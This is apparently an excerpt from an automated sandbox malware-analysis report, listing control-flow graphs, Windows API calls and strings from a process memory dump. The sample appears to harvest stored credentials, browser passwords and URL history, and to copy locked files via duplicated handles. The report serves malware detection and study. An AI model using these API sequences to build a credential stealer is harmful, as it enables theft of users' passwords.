                                    • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                    • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                    • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                    APIs
                                    • memset.MSVCRT ref: 0041898C
                                    • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: InfoSystemmemset
                                    • String ID:
                                    • API String ID: 3558857096-0
                                    • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                    • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                    • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                    • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 39 44558e-445594 call 444b06 4->39 40 44557e-44558c call 4136c0 call 41366b 4->40 16 4455e5 5->16 17 4455e8-4455f9 5->17 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 19 445861-445874 call 40a889 call 403c9c 13->19 20 4458ac-4458b5 13->20 42 445823-445826 14->42 16->17 24 445672-445683 call 40a889 call 403fbe 17->24 25 4455fb-445601 17->25 50 445879-44587c 19->50 26 44594f-445958 20->26 27 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 20->27 84 445685 24->84 85 4456b2-4456b5 call 40b1ab 24->85 28 445605-445607 25->28 29 445603 25->29 35 4459f2-4459fa 26->35 36 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 26->36 135 44592d-445945 call 40b6ef 27->135 136 44594a 27->136 28->24 38 445609-44560d 28->38 29->28 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 35->44 45 445b29-445b32 35->45 153 4459d0-4459e8 call 40b6ef 36->153 154 4459ed 36->154 38->24 48 44560f-445641 call 4087b3 call 40a889 call 4454bf 38->48 39->3 40->39 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 150 445665-445670 call 40b1ab 48->150 151 445643-445663 call 40a9b5 call 4087b3 48->151 64 4458a2-4458aa call 40b1ab 50->64 65 44587e 50->65 51->13 66 44582e-445847 call 40a9b5 call 4087b3 52->66 60 445d1c-445d25 53->60 61 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->61 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->67 68 445b98-445ba0 54->68 73 445fae-445fb2 60->73 74 445d2b-445d3b 60->74 168 445cf5 61->168 169 445cfc-445d03 61->169 64->20 82 445884-44589d call 40a9b5 call 4087b3 65->82 138 445849 66->138 247 445c77 67->247 68->67 83 445ba2-445bcf call 4099c6 call 445403 call 445389 68->83 89 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 74->89 90 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 74->90 156 44589f 82->156 83->53 99 44568b-4456a4 call 40a9b5 call 4087b3 84->99 116 4456ba-4456c4 85->116 162 445d67-445d6c 89->162 163 445d71-445d83 call 445093 89->163 196 445e17 90->196 197 445e1e-445e25 90->197 158 4456a9-4456b0 99->158 117 4457f9 116->117 118 4456ca-4456d3 call 413cfa call 413d4c 116->118 117->6 172 4456d8-4456f7 call 40b2cc call 413fa6 118->172 135->136 136->26 138->51 150->116 151->150 153->154 154->35 156->64 158->85 158->99 174 445fa1-445fa9 call 40b6ef 162->174 163->73 168->169 179 445d05-445d13 169->179 180 445d17 169->180 205 4456fd-445796 memset * 4 call 409c70 * 3 172->205 206 4457ea-4457f7 call 413d29 172->206 174->73 179->180 180->60 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 205->206 246 445798-4457ca call 40b2cc call 409d1f call 409b98 205->246 206->10 218->73 253 445f9b 218->253 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->206 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 253->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->206 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                    APIs
                                    • memset.MSVCRT ref: 004455C2
                                    • wcsrchr.MSVCRT ref: 004455DA
                                    • memset.MSVCRT ref: 0044570D
                                    • memset.MSVCRT ref: 00445725
                                      • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                      • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                      • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                      • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                      • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                      • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                      • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                      • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                    • memset.MSVCRT ref: 0044573D
                                    • memset.MSVCRT ref: 00445755
                                    • memset.MSVCRT ref: 004458CB
                                    • memset.MSVCRT ref: 004458E3
                                    • memset.MSVCRT ref: 0044596E
                                    • memset.MSVCRT ref: 00445A10
                                    • memset.MSVCRT ref: 00445A28
                                    • memset.MSVCRT ref: 00445AC6
                                      • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                      • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                      • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                      • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                      • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                    • memset.MSVCRT ref: 00445B52
                                    • memset.MSVCRT ref: 00445B6A
                                    • memset.MSVCRT ref: 00445C9B
                                    • memset.MSVCRT ref: 00445CB3
                                    • _wcsicmp.MSVCRT ref: 00445D56
                                    • memset.MSVCRT ref: 00445B82
                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                    • memset.MSVCRT ref: 00445986
                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                    • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                    • API String ID: 2745753283-3798722523
                                    • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                    • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                    • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                    • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                      • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                      • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                      • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                    • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                    • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                    • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                    • String ID: $/deleteregkey$/savelangfile
                                    • API String ID: 2744995895-28296030
                                    • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                    • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                    • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                    • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                    Control-flow Graph

                                    APIs
                                    • memset.MSVCRT ref: 0040B71C
                                      • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                      • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                    • wcsrchr.MSVCRT ref: 0040B738
                                    • memset.MSVCRT ref: 0040B756
                                    • memset.MSVCRT ref: 0040B7F5
                                    • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                    • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                    • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                    • memset.MSVCRT ref: 0040B851
                                    • memset.MSVCRT ref: 0040B8CA
                                    • memcmp.MSVCRT ref: 0040B9BF
                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                    • memset.MSVCRT ref: 0040BB53
                                    • memcpy.MSVCRT ref: 0040BB66
                                    • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                                    • String ID: chp$v10
                                    • API String ID: 170802307-2783969131
                                    • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                    • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                    • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                    • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 504 4091b8-40921b memset call 40a6e6 call 444432 509 409520-409526 504->509 510 409221-40923b call 40b273 call 438552 504->510 514 409240-409248 510->514 515 409383-4093ab call 40b273 call 438552 514->515 516 40924e-409258 call 4251c4 514->516 528 4093b1 515->528 529 4094ff-40950b call 443d90 515->529 521 40937b-40937e call 424f26 516->521 522 40925e-409291 call 4253cf * 2 call 4253af * 2 516->522 521->515 522->521 552 409297-409299 522->552 532 4093d3-4093dd call 4251c4 528->532 529->509 538 40950d-409511 529->538 539 4093b3-4093cc call 4253cf * 2 532->539 540 4093df 532->540 538->509 542 409513-40951d call 408f2f 538->542 539->532 555 4093ce-4093d1 539->555 543 4094f7-4094fa call 424f26 540->543 542->509 543->529 552->521 554 40929f-4092a3 552->554 554->521 556 4092a9-4092ba 554->556 555->532 557 4093e4-4093fb call 4253af * 2 555->557 558 4092bc 556->558 559 4092be-4092e3 memcpy memcmp 556->559 557->543 569 409401-409403 557->569 558->559 560 409333-409345 memcmp 559->560 561 4092e5-4092ec 559->561 560->521 564 409347-40935f memcpy 560->564 561->521 563 4092f2-409331 memcpy * 2 561->563 566 409363-409378 memcpy 563->566 564->566 566->521 569->543 570 409409-40941b memcmp 569->570 570->543 571 409421-409433 memcmp 570->571 572 4094a4-4094b6 memcmp 571->572 573 409435-40943c 571->573 572->543 575 4094b8-4094ed memcpy * 2 572->575 573->543 574 409442-4094a2 memcpy * 3 573->574 576 4094f4 574->576 575->576 576->543
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                    • String ID:
                                    • API String ID: 3715365532-3916222277
                                    • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                    • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                    • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                    • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                      • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                      • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                      • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                      • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                      • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                    • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                    • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                    • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                    • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                    • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                    • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                    • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                    • CloseHandle.KERNEL32(?), ref: 0040E148
                                    • CloseHandle.KERNEL32(?), ref: 0040E14D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                    • String ID: bhv
                                    • API String ID: 327780389-2689659898
                                    • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                    • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                    • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                    • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 633 413f4f-413f52 634 413fa5 633->634 635 413f54-413f5a call 40a804 633->635 637 413f5f-413fa4 GetProcAddress * 5 635->637 637->634
                                    APIs
                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                    • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                    • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                    • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                    • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                    • API String ID: 2941347001-70141382
                                    • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                    • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                    • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                    • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 638 4466f4-44670e call 446904 GetModuleHandleA 641 446710-44671b 638->641 642 44672f-446732 638->642 641->642 643 44671d-446726 641->643 644 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 642->644 646 446747-44674b 643->646 647 446728-44672d 643->647 653 4467ac-4467b7 __setusermatherr 644->653 654 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 644->654 646->642 648 44674d-44674f 646->648 647->642 650 446734-44673b 647->650 652 446755-446758 648->652 650->642 651 44673d-446745 650->651 651->652 652->644 653->654 657 446810-446819 654->657 658 44681e-446825 654->658 659 4468d8-4468dd call 44693d 657->659 660 446827-446832 658->660 661 44686c-446870 658->661 664 446834-446838 660->664 665 44683a-44683e 660->665 662 446845-44684b 661->662 663 446872-446877 661->663 669 446853-446864 GetStartupInfoW 662->669 670 44684d-446851 662->670 663->661 664->660 664->665 665->662 667 446840-446842 665->667 667->662 671 446866-44686a 669->671 672 446879-44687b 669->672 670->667 670->669 673 44687c-446894 GetModuleHandleA call 41276d 671->673 672->673 676 446896-446897 exit 673->676 677 44689d-4468d6 _cexit 673->677 676->677 677->659
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                    • String ID:
                                    • API String ID: 2827331108-0
                                    • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                    • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                    • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                    • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                    Control-flow Graph

                                    APIs
                                    • memset.MSVCRT ref: 0040C298
                                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                    • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                    • wcschr.MSVCRT ref: 0040C324
                                    • wcschr.MSVCRT ref: 0040C344
                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                    • GetLastError.KERNEL32 ref: 0040C373
                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                    • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                    • String ID: visited:
                                    • API String ID: 1157525455-1702587658
                                    • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                    • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                    • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                    • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 704 40e175-40e1a1 call 40695d call 406b90 709 40e1a7-40e1e5 memset 704->709 710 40e299-40e2a8 call 4069a3 704->710 712 40e1e8-40e1fa call 406e8f 709->712 716 40e270-40e27d call 406b53 712->716 717 40e1fc-40e219 call 40dd50 * 2 712->717 716->712 722 40e283-40e286 716->722 717->716 728 40e21b-40e21d 717->728 725 40e291-40e294 call 40aa04 722->725 726 40e288-40e290 ??3@YAXPAX@Z 722->726 725->710 726->725 728->716 729 40e21f-40e235 call 40742e 728->729 729->716 732 40e237-40e242 call 40aae3 729->732 732->716 735 40e244-40e26b _snwprintf call 40a8d0 732->735 735->716
                                    APIs
                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                    • memset.MSVCRT ref: 0040E1BD
                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                      • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                      • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                    • _snwprintf.MSVCRT ref: 0040E257
                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                    • String ID: $ContainerId$Container_%I64d$Containers$Name
                                    • API String ID: 3883404497-2982631422
                                    • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                    • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                    • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                    • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                      • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                    • memset.MSVCRT ref: 0040BC75
                                    • memset.MSVCRT ref: 0040BC8C
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                    • memcmp.MSVCRT ref: 0040BCD6
                                    • memcpy.MSVCRT ref: 0040BD2B
                                    • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                    • String ID:
                                    • API String ID: 509814883-3916222277
                                    • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
